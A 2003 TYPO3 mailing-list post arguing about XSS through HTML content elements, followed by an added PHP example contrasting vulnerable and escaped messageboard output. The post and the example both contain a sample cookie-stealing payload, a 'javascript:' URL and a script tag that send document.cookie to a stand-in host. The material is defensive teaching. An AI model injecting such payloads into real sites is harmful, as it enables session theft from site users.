[Typo3-dev] Security Problem - HTML

Kasper Skårhøj kasper at typo3.com
Wed Sep 24 09:07:35 CEST 2003


My opinion:

- The security should be heightened with a check for the IP in addition to the cookie. That check will be configurable in TYPO3_CONF_VARS (for both FE + BE logins) with a default value of "enabled" (thus people with ISDN/phone lines can still disable it if it is annoying).

Apart from that, what they describe is not a bug but a feature: the point of the HTML element is that the user can insert HTML! They can spoil many things with that. In fact the report is not very visionary since a much smarter approach would be to [...I'll keep the details to myself so kiddies don't get funny ideas...] - thus you get yourself a nice backend account with admin rights and don't have to worry about the IP lock we are going to implement now!
OK, so let us parse the HTML - however, that is not even close to a solution since most other elements allow HTML.
So what about parsing all text? Well, backend administrators can still insert links like "javascript:document.location='http://mydomain/?cookie='+document.cookie" - although that requires people to click the link, which the other solution doesn't.

The solution is of course to heighten security with additional measures like the existing IP locking, with burglar alarms (like the mail warnings), HTTP auth protection, etc.
Further, backend users should be "trusted" users to some degree, and bitching over a backend user's ability to enter harmful HTML is really nothing compared to the potential number of security holes in extensions where users of the *website* (non-trusted) could inject HTML or, more potentially, a "javascript:...." URL in a messageboard.

But OK, let's make the IP lock. But there is no way around it: your backend users are given a certain amount of potential to harm you and your site, and you should therefore be able to trust them. And then let's focus on the real danger, which is frontend plugins that allow outsiders to enter information which is subsequently displayed on the webpage.

For extension designers and others interested, please read the security section in "Inside TYPO3" (or is it the Coding Guidelines document?) where it is clearly explained what measures you can take against XSS (Cross Site Scripting). You can start by simply remembering to pipe all your output through "htmlspecialchars()" ... (which is not done in the HTML CE since ... that is the point!)


- kasper
-------------------- o ---------------------
>>>    In God I trust - others pay cash!     <<<
Check www.typo3.com
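The following is an added example illustrating the two points the post makes about frontend plugins: piping visitor-supplied output through htmlspecialchars(), and the fact that escaping alone does not stop a "javascript:" URL placed in a link. It is example code written for this page, not TYPO3 code or code from the author; the messageboard plugin, its field names (name, homepage, body) and the sample submissions are all assumptions constructed for the demonstration.

```php
<?php
// Added example, not TYPO3 code. Assumed scenario: a messageboard frontend
// plugin that stores a name, a homepage URL and a message body entered by
// anonymous website visitors and later prints them on the page.

declare(strict_types=1);

// Vulnerable: echoes visitor input straight into the page, so any HTML or
// script the visitor submitted becomes part of the page for every reader.
function renderPostVulnerable(array $post): string
{
    return '<div class="post">'
         . '<a href="' . $post['homepage'] . '">' . $post['name'] . '</a>'
         . '<p>' . $post['body'] . '</p>'
         . '</div>';
}

// Hardened: every visitor-supplied value goes through htmlspecialchars().
// ENT_QUOTES also escapes single quotes, which matters inside attributes;
// the charset argument must match the charset the page is served with.
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// htmlspecialchars() does not help for an href: the string
// "javascript:document.location='http://mydomain/?cookie='+document.cookie"
// contains no characters it would change, so the link stays clickable.
// The URL needs its own check: allow only absolute http(s) URLs and drop
// everything else (javascript:, data:, vbscript:, relative paths, ...).
// Matching "^https?://" after trimming also defeats scheme-obfuscation
// tricks such as leading whitespace, because nothing else is accepted.
function safeUrl(string $url): string
{
    $url = trim($url);
    if (!preg_match('#^https?://#i', $url)) {
        return '';
    }
    return $url;
}

function renderPostSafe(array $post): string
{
    $href = escapeHtml(safeUrl($post['homepage']));
    return '<div class="post">'
         . '<a href="' . $href . '">' . escapeHtml($post['name']) . '</a>'
         . '<p>' . escapeHtml($post['body']) . '</p>'
         . '</div>';
}

// Constructed sample submissions, as an outsider could enter them in a form.
$posts = [
    [
        'name'     => 'alice',
        'homepage' => 'http://example.com/',
        'body'     => 'Hello <b>world</b>',
    ],
    [
        'name'     => 'kiddie',
        'homepage' => "javascript:document.location='http://mydomain/?cookie='+document.cookie",
        'body'     => '<script>document.location="http://mydomain/?cookie="+document.cookie</script>',
    ],
];

foreach ($posts as $post) {
    echo "vulnerable: ", renderPostVulnerable($post), "\n";
    echo "safe:       ", renderPostSafe($post), "\n\n";
}
```

Run with `php example.php`. For the second submission the vulnerable renderer emits the `<script>` block verbatim and a link whose href is the cookie-stealing "javascript:" URL; the hardened renderer prints the script as inert text (`&lt;script&gt;...`) and an empty href, because escaping handles the body while the scheme allowlist handles the link. Escaping output is the general rule; a URL that ends up in an attribute additionally needs the scheme check, as the post's "javascript:..." example shows.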